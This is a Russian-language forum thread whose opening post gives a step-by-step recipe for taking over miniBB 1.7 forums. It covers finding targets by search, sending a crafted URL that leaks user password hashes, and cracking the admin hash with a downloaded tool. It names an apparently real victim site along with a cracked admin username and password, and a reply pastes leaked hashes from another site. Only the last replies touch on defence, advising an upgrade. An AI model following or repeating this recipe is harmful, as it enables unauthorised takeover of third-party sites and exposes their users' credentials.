day & night

Ломаем форумы на miniBB 1.7, собственно как :)...
Дата обновления: , перейти к новому сообщению
#1
PRYANIK



Made In Tula
[SoftoRooMTeaM] Group Icon

Группа: Администраторы
Сообщений: 31.432
Регистрация: 22.02.2004
Пользователь №: 7


Респектов: 6457
-----XXXXX




Ломаем форумы на движке miniBB 1.7

1) Поисковичком находим будущего "счастливчика" smile.gif

2) Браузером отсылаем такой запрос на его сайт
http://www.его_адресс...minibb_users/*

Пример, из жизни smile.gif...
http://www.sidecar-cz...minibb_users/*

• 3) Получаем всякую инфу о "админе", а вместе с инфой и все пароли пользователей в хэше...

Пример, всё из того же форума

Начало списка хэша (перед ним могут быть темы, посты и другая лабуда...)
76cebb2c444d72118969791fc106cde2 ----пароль админа
5da39f38b5a9ec024878d18b097b2fa7 ---пароль второго юзверя, или второго админа

пароли выскакивают в нужном нам порядке...

• 4) Качаем эту прожку _http://www.insidepro....sswordspro.zip

• 5) Вбиваем в неё хэшь админа, в списке, он всегда в самом верху (Из примера, он будет такой
Code
76cebb2c444d72118969791fc106cde2
)


• 6) Перебираем...

• 7) Получаем (из примера)
Ник: Magerio (узнали его из запроса браузера... смотри пунктик "2")
Пароль: terra

• 8) Вводим эти данные, наслаждаймся уже своим форумом smile.gif...

спасибо Фаргу за идею smile.gif


--------------------
Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it!


Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк
User is offline
Go topGo end

Ответов(20 - 23)
29.11.2006 - 16:36
#21
Sashko123456



Unregistered














Вот скрин что у мя выбивает на компе:

user posted image

К сожелению размер маленький =( Вообще буду искать инфу в другом месте. Сдесь мне не кто не поможет
Go topGo end
29.11.2006 - 18:54
#22
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Никто ему не поможет, бедняга... Мозг включи свой! dry.gif
Читай по слогам:
QUOTE
Username 
admin
Registration date 
May 3, 2004 08:46:48
Last topics posted 

    * LA WEB DEL CLASSIC EN CHILE
    * NO AL CIERRE DEL AUTOMUSEUM STÖRY
    * -
    * COMPRO PTV FURGONETA
    * UN BISCUTER POR 5 € !!!! (en caso de suerte)
    * COMO PONER MENSAJES EN EL FORUM
    * 6a44a2660a895ff9b954a9e5b71a7d9f
    * 8f9a4c5fe0824547590a3fc568f5c7c7
    * 1ea8c1b4aec283405f313cd24443e6c5
    * 270008abe240211085e47f3d0d2ec76e
    * 2641129d1203141fa655b16d1b86ff63
    * 37b19816109a32106d109e83bbb3c97d
    * 655a2a4a10081939dd617dd963e86154
    * 7218948a874f956611302019630e0c01
    * 560aaad3a5089d2b47ea82c6607a7c84
    * 1d736e7dddfa3abc63af0b8ef955fd31
    * 1a8f0b75016104ebafdc3cee972819a1
    * 2dcc6978a1873d8a47cf1955af4f97d6
    * 8ba391f8f020fa1437f003acb52a9af7
    * 301c3c9de34c81c99a402ad8010e13de
    * e3417f85d42918a9469a1fff18314161
    * 3588fc380b547dfe26e2561c8e588189
    * 59302bcdd415e17009ff1612f5a69625
    * a17053cca0901973c72654a98241b7f9
    * efd3aaee9df508dc3b4aa930c2673798
    * 98865472aa92997f752fb7a7274812d6

Вот, это называют хэшом, в данном сдучае - это админский хэш. На следующей строке - хэш второго зарегистрированного юзера, в третьей - третьего и т.д.
Что тебе ещё сказать? Что в этой ерунде может быить непонятного? offtopic.gif
User is offline
Go topGo end
24.10.2008 - 5:47
#23
Crab2



Опытный юзверь
**

Группа: Пользователи
Сообщений: 55
Регистрация: 29.07.2008
Из: Челябинск
Пользователь №: 1.002.574


Респектов: 1
-----X----


Предупреждений:


Стоящая вещь))) нужно будет думать как защищаться от этого, никто не поможет7
User is offline
Go topGo end
24.10.2008 - 7:54
#24
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Crab2, ставь новые версии форума.
User is offline
Go topGo end

Topic Options
Сейчас: 9.05.2024 - 1:18
Мобильная версия | Lite версия